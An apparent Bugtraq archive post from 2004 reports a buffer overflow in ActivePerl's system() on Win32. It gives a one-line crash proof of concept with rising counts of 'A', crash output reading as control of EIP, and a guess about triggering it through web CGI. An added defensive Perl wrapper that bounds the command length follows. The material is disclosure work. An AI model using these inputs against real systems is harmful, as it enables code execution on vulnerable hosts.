Bugtraq mailing list archives

Re: Buffer Overflow in ActivePerl ?


From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 19 May 2004 01:29:41 +1200

"Oliver () greyhat de" <Oliver () greyhat de> wrote:

> i played around with ActiveState's ActivePerl for Win32, and crashed 
> Perl.exe with the following command:
> 
> perl -e "$a="A" x 256; system($a)"

Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus 
all but last week's security patch:

   perl -e "$a="A" x 256; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x00657865".  The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

   C:\>perl -e "$a="A" x 259; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x65004141".  The memory could not be "written".

and we seem to get control of EIP.  Coincidence?  Try yet two more:

   C:\>perl -e "$a="A" x 261; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x41414141".  The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless 
perhaps a script processor on a web server can be cajoled into doing 
something with this??  (Not at all familiar with the innards of Windows 
web servers and their relationship to their CGI, etc processors...)


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
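The last paragraph of the post asks whether a CGI-style script could be made to feed something like this to system(). The following is an added example (not code from the post or from ActiveState) of the defensive pattern a script author can apply on the calling side: bound the length of anything passed to system(), keep an allow-list of permitted commands, reject shell metacharacters, and use the list form so no shell is involved. The 200-byte limit, the allow-listed command names and the argument character class are all assumptions chosen for the example; the limit is set below the 256 bytes at which the post reports the crash, and it is the length check, not the list form, that is assumed to keep the script away from the reported failure.

```perl
#!/usr/bin/perl
# Added example (not from the original post): a wrapper that never hands
# user-controlled text of arbitrary length to system().
use strict;
use warnings;

# Assumed conservative limit: the post reports crashes once the command
# string reaches 256 bytes, so refuse anything approaching that.
use constant MAX_CMD_LEN => 200;

# Hypothetical allow-list of commands a script is permitted to run.
my %ALLOWED = map { $_ => 1 } qw(whoami hostname);

# Returns ($exit_status, undef) on success, (undef, $reason) on refusal.
sub safe_system {
    my ($cmd, @args) = @_;

    # Bound the total length passed to system() regardless of its source.
    my $total = length(join(' ', $cmd, @args));
    return (undef, "command line too long ($total bytes)")
        if $total > MAX_CMD_LEN;

    # Reject anything not on the allow-list before it goes anywhere near a shell.
    return (undef, "command not permitted") unless $ALLOWED{$cmd};

    # Arguments may only contain word characters, dots and dashes (assumed policy).
    for my $arg (@args) {
        return (undef, "unsafe characters in argument")
            if $arg =~ /[^\w.\-]/;
    }

    # List form: no shell, each argument stays a separate string.
    my $rc = system($cmd, @args);
    return ($rc, undef);
}

# Constructed input mirroring the post's test case: 261 bytes of 'A'.
my $oversized = 'A' x 261;
my ($rc, $err) = safe_system($oversized);
print "refused: $err\n" if defined $err;    # command line too long (261 bytes)

# A permitted command with no arguments goes through.
($rc, $err) = safe_system('hostname');
print defined $err ? "refused: $err\n" : "exit status: $rc\n";
```

The length check runs before the allow-list check on purpose: an oversized string is refused without ever being compared, parsed or logged in full, which also keeps the refusal message short if it ends up in a web server log.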
